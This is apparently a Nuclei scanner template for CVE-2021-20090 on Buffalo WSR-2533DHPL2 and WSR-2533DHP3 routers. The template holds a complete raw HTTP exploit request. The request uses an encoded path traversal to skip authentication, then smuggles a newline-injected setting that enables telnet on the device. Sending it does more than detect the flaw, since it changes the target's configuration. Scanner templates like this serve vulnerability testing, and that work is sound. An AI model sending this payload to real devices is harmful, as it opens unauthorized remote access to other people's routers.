id: buffalo-config-injection

info:
  name: Buffalo WSR-2533DHPL2 - Configuration File Injection
  author: gy741
  severity: critical
  description: |
    The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
  reference: |
      - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild
      - https://www.tenable.com/security/research/tra-2021-13
      - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
  tags: buffalo,firmware,iot

requests:
  - raw:
      - |
        POST /images/..%2fapply_abstract.cgi HTTP/1.1
        Host: {{Hostname}}
        Connection: close

        action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0A
        ARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "/Success.htm"

      - type: status
        status:
          - 302